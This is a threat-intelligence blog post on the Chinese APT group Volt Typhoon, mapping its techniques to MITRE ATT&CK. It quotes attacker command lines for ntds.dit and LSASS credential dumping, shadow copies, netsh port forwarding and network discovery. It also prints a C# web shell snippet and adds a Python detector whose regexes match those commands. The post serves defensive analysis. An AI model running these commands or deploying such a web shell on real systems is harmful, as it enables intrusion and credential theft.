Volt Typhoon: The Chinese APT Group Abuses LOLBins for Cyber Espionage

  By Hüseyin Can YÜCEEL  •  June 01, 2023

 

The Red Report 2023

The Top 10 MITRE ATT&CK Techniques Used by Adversaries

DOWNLOAD

On May 24th, 2023, the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on a state-sponsored Chinese APT group, Volt Typhoon [1]. Volt Typhoon threat actors focus on cyber espionage campaigns that target critical infrastructure organizations in the United States and the Asia region. For their malicious operations, the APT group primarily uses Living Off The Land Binaries (LOLBins) so that its activity blends into legitimate administration and goes undetected in the target's network.

In this blog post, we explain the tools and techniques used by Volt Typhoon and how the group abuses Living Off The Land Binaries (LOLBins).

Simulate State-Sponsored Cyber Threats with 14-Day Free Trial of Picus Platform

Volt Typhoon: PRC State-Sponsored Cyber Espionage Group

Volt Typhoon (also known as BRONZE SILHOUETTE) is a People's Republic of China (PRC) state-sponsored APT group that focuses on stealthy and targeted cyber espionage campaigns against critical infrastructure organizations. The threat group has been actively targeting communications, construction, education, government, information technology, manufacturing, maritime, transportation, and utility sectors for nearly two years. 

The main objective of Volt Typhoon is to collect and exfiltrate sensitive information while avoiding detection. For this purpose, the APT group uses living-off-the-land techniques to mask their malicious activities as legitimate operations. The typical espionage campaign for Volt Typhoon follows initial access, living-off-the-land reconnaissance, lateral movement, and data exfiltration through C2 channels, in this order. In each step, adversaries use defense evasion techniques to hide their tracks.

Techniques and LOLBins used by Volt Typhoon

Initial Access

T1078 Valid Accounts & T1190 Exploit Public-Facing Application

Volt Typhoon gains initial access to its targets' environments using stolen credentials of valid accounts. The group is also known to exploit public-facing Fortinet FortiGuard devices, the ManageEngine ADSelfService Plus RCE vulnerability CVE-2021-40539, and the FatPipe RCE vulnerability CVE-2021-27860 for initial access.

Execution

T1047 Windows Management Instrumentation

Adversaries use Windows Management Instrumentation for discovery, credential dumping, and command execution.

//Information gathering from the compromised host
wmic path win32_logicaldisk get caption,filesystem,freespace,size,volumename

//Extracting ntds.dit for credential dumping (ntdsutil "install from media" export spawned via WMI)
wmic process call create "ntdsutil \"ac i ntds\" ifm \"create full <filepath>\""

T1059 Command and Scripting Interpreter

Threat actors use PowerShell and Windows Command Shell to execute malicious commands in compromised hosts.

//Creating a volume shadow copy
cmd /c vssadmin create shadow /for=C: > <filepath>

//Port forwarding for defense evasion
cmd.exe /c "netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress=<internal_ip_address> connectport=8443 protocol=tcp"

//Dumping LSASS memory for credential access
cmd.exe /c powershell -exec bypass -W hidden -nop -E rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 552 C:\Windows\Temp\vmware-vhost.dmp full

Persistence

T1505.003 Server Software Component: Web Shell

Volt Typhoon deploys backdoor web shells to maintain persistent access to compromised networks. The web shell appears to be a derivative of the Awen web shell and includes AES-encrypted or base64-encoded communication capabilities for C2.

//Snippet from the C#-based Awen-derivative web shell (syntax corrected; Decrypt() is defined elsewhere in the shell and not shown)

using System;
using System.Diagnostics;
using System.IO;
using System.Text;

string ExcuteCmd(string arg)
{
    // "cmd.exe" is assembled from a char array so the literal string does not appear in the file
    char[] array = { 'c', 'm', 'd', '.', 'e', 'x', 'e' };
    string cmd = new string(array);
    ProcessStartInfo psi = new ProcessStartInfo();
    psi.FileName = cmd;
    psi.Arguments = "/c " + arg;          // the operator-supplied command is passed to cmd.exe
    psi.RedirectStandardOutput = true;
    psi.UseShellExecute = false;
    psi.RedirectStandardError = true;
    Process p = Process.Start(psi);
    StreamReader stmrdr = p.StandardOutput;
    string CmdOut = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
    string encmdout = Decrypt(CmdOut);    // encoding/encryption routine defined elsewhere in the web shell
    byte[] enbase64 = Encoding.Default.GetBytes(encmdout);
    string enstr = Convert.ToBase64String(enbase64); // base64 so the result travels in the HTTP response
    stmrdr.Close();
    return enstr;
}

Defense Evasion

T1564 Hide Artifacts & T1070 Indicator Removal

Volt Typhoon selectively removes Windows Event Logs, system logs, artifacts, and other evidence of its malicious activity to hide its presence and limit threat-hunting activities.

Credential Access

T1003 OS Credential Dumping

As a cyber espionage group, Volt Typhoon gathers credentials of valid accounts in its victims' networks. These credentials let the actors navigate and execute commands in the network without raising alerts. For credential dumping, they extract the ntds.dit file and the SYSTEM registry hive from Windows domain controllers or from volume shadow copies. From the extracted ntds.dit and SECURITY files, Volt Typhoon harvests the credentials of valid accounts.

//Creating a volume shadow copy
cmd /c vssadmin create shadow /for=C: > <filepath>

//Extracting ntds.dit from the shadow copy
cmd /c copy <VSS_path>\Windows\NTDS\ntds.dit C:\Windows\Temp > <filepath>

Discovery

Volt Typhoon enumerates compromised networks to discover users, hosts, and services. The gathered information is leveraged in the data exfiltration and lateral movement phases of the attack campaign.

//T1033 System Owner/User Discovery & T1069 Permission Groups Discovery
whoami
net localgroup administrators
net group /dom
net group "Domain Admins" /dom

//T1016 System Network Configuration Discovery & T1082 System Information Discovery
arp -a
dnscmd . /enumrecords /zone {REDACTED}
ipconfig /all
netsh interface firewall show all
netsh interface portproxy show all
netsh interface portproxy show v4tov4
netsh firewall show all
netsh portproxy show v4tov4
netstat -ano
reg query hklm\software\
systeminfo
tasklist /v
wmic volume list brief
wmic service brief
wmic product list brief
wmic baseboard list full
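As an added example (not code from this post or from Picus), a small detector for the command lines quoted in the Execution, Credential Access, and Discovery sections above: it matches process-creation command lines (for example the CommandLine field of Windows Security event 4688 or Sysmon event 1) against the high-fidelity ntdsutil, vssadmin, comsvcs.dll and netsh portproxy patterns, and separately flags a host that runs many distinct discovery binaries, since each of those is harmless on its own. Hostnames, paths and IP addresses in the sample events are constructed.

```python
"""Detection logic for the LOLBin command lines quoted in this post (added example, not from
the post or from Picus). Input: process-creation command lines; sample events are constructed."""
import re
from collections import defaultdict

# High-fidelity rules: (rule name, ATT&CK technique, case-insensitive regex over the command line)
RULES = [
    ("ntdsutil IFM dump of ntds.dit", "T1003.003", r"ntdsutil.+\bac\s+i\s+ntds\b.+\bifm\b.+create\s+full"),
    ("vssadmin shadow copy creation", "T1003.003", r"vssadmin(?:\.exe)?\s+create\s+shadow"),
    ("ntds.dit copied out of a shadow copy", "T1003.003", r"\bcopy\b.*\\windows\\ntds\\ntds\.dit"),
    ("comsvcs.dll MiniDump (LSASS dump)", "T1003.001", r"comsvcs\.dll\s*,\s*minidump"),
    ("netsh portproxy listener added", "T1090", r"netsh\s+interface\s+portproxy\s+add\s+v4tov4"),
]
COMPILED = [(n, t, re.compile(p, re.IGNORECASE)) for n, t, p in RULES]

# Low-fidelity discovery binaries from the post: alert only when one host runs many distinct ones.
DISCOVERY = re.compile(r'^(?:cmd(?:\.exe)?\s+/c\s+)?"?(whoami|net|arp|dnscmd|ipconfig|netsh|netstat'
                       r'|reg|systeminfo|tasklist|wmic)(?:\.exe)?\b', re.IGNORECASE)
DISCOVERY_THRESHOLD = 5

def match_command_line(cmdline):
    """Return (rule name, technique) for every high-fidelity rule the command line triggers."""
    return [(n, t) for n, t, rx in COMPILED if rx.search(cmdline)]

def scan_events(events):
    """events: dicts with 'host' and 'cmdline'. Returns one alert dict per rule hit or burst."""
    alerts, tools_by_host = [], defaultdict(set)
    for ev in events:
        for name, technique in match_command_line(ev["cmdline"]):
            alerts.append({"host": ev["host"], "technique": technique, "rule": name})
        m = DISCOVERY.match(ev["cmdline"].strip())
        if m:
            tools_by_host[ev["host"]].add(m.group(1).lower())
    for host, tools in sorted(tools_by_host.items()):
        if len(tools) >= DISCOVERY_THRESHOLD:   # reconnaissance burst on a single host
            alerts.append({"host": host, "technique": "T1082/T1016/T1033/T1069",
                           "rule": "discovery burst: " + ", ".join(sorted(tools))})
    return alerts

# Constructed sample events modelled on the commands quoted above (hosts, paths and IPs are placeholders).
SAMPLE_EVENTS = [
    {"host": "dc01", "cmdline": 'wmic process call create "ntdsutil \\"ac i ntds\\" ifm \\"create full C:\\Windows\\Temp\\pro\\""'},
    {"host": "dc01", "cmdline": "cmd /c vssadmin create shadow /for=C: > C:\\Windows\\Temp\\out.txt"},
    {"host": "dc01", "cmdline": "cmd /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\ntds.dit C:\\Windows\\Temp"},
    {"host": "srv02", "cmdline": 'cmd.exe /c "netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress=10.0.0.5 connectport=8443 protocol=tcp"'},
    {"host": "srv02", "cmdline": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 552 C:\\Windows\\Temp\\vmware-vhost.dmp full"},
] + [{"host": "ws03", "cmdline": c} for c in ("whoami", "net localgroup administrators", "arp -a",
                                              "ipconfig /all", "netstat -ano", "tasklist /v")]

if __name__ == "__main__":
    for a in scan_events(SAMPLE_EVENTS):
        print(f"{a['host']}: [{a['technique']}] {a['rule']}")
```

Running the block reports three credential-dumping hits on dc01, the portproxy listener and LSASS dump on srv02, and one discovery burst on ws03; a lone `netsh interface portproxy show v4tov4` produces no alert.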

Command and Control

T1090 Proxy

Volt Typhoon uses compromised small office/home office (SOHO) network devices as proxies to hide the malicious traffic between its victims' networks and its C2 servers.

How Does Picus Help Simulate Volt Typhoon Attacks?

We also strongly suggest simulating Volt Typhoon attacks to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Complete Security Validation Platform. You can also test your defenses against hundreds of other state-sponsored threat actors, such as Lazarus, Turla, APT33, and Sandworm, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for the Volt Typhoon group:

Threat ID   Threat Name                                Attack Module
55804       Volt Typhoon Threat Group Campaign 2023    Endpoint

References

[1] "People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection," Cybersecurity and Infrastructure Security Agency CISA. [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a
